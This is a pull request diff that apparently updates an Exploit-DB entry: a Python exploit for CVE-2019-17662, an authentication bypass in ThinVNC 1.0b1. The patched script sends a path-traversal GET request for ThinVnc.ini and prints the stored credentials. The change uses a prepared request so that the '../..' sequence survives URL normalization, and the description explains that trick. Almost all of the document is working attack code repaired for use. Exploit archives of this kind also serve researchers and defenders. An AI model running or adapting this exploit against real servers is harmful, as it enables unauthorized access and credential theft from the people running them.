### PR TITLE
Fix for EDBID: 47519 - Update CVE-2019-17662 to Work Again

### DIFF
--- a/exploits/windows/remote/47519.py
+++ b/exploits/windows/remote/47519.py
@@ -1,17 +1,19 @@
+#!/usr/bin/python3
+
 # Exploit Title: ThinVNC 1.0b1 - Authentication Bypass
 # Date: 2019-10-17
 # Exploit Author: Nikhith Tumamlapalli
 # Contributor WarMarX
+# Patched to work again by GoProSlowYo
 # Vendor Homepage: https://sourceforge.net/projects/thinvnc/
 # Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download
 # Version: 1.0b1
 # Tested on: Windows All Platforms
-# CVE : CVE-2019-17662
+# CVE: CVE-2019-17662
 
 # Description:
 # Authentication Bypass via Arbitrary File Read
 
-#!/usr/bin/python3
 
 import sys
 import os
@@ -19,11 +21,18 @@ import requests
 
 def exploit(host,port):
     url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini"
-    r = requests.get(url)
-    body = r.text
+    session = requests.Session()
+    req = requests.Request(method='GET', url=url)
+    prep = req.prepare()
+    prep.url = url
+    res = session.send(prep, timeout=3)
+
+    if res.status_code != 200:
+        print(f"Error! HTTP Code: {res.status_code}")
+        sys.exit(127)
+    body = res.text
     print(body.splitlines()[2])
     print(body.splitlines()[3])
-
 
 
 def main():


### PR DESCRIPTION
# Fix for EDBID: 47519 

## Update CVE-2019-17662 to Work Again

This just makes the requests library essential force the `../..` in the URL by setting the URL again in the prepared request with `prep.url = url`.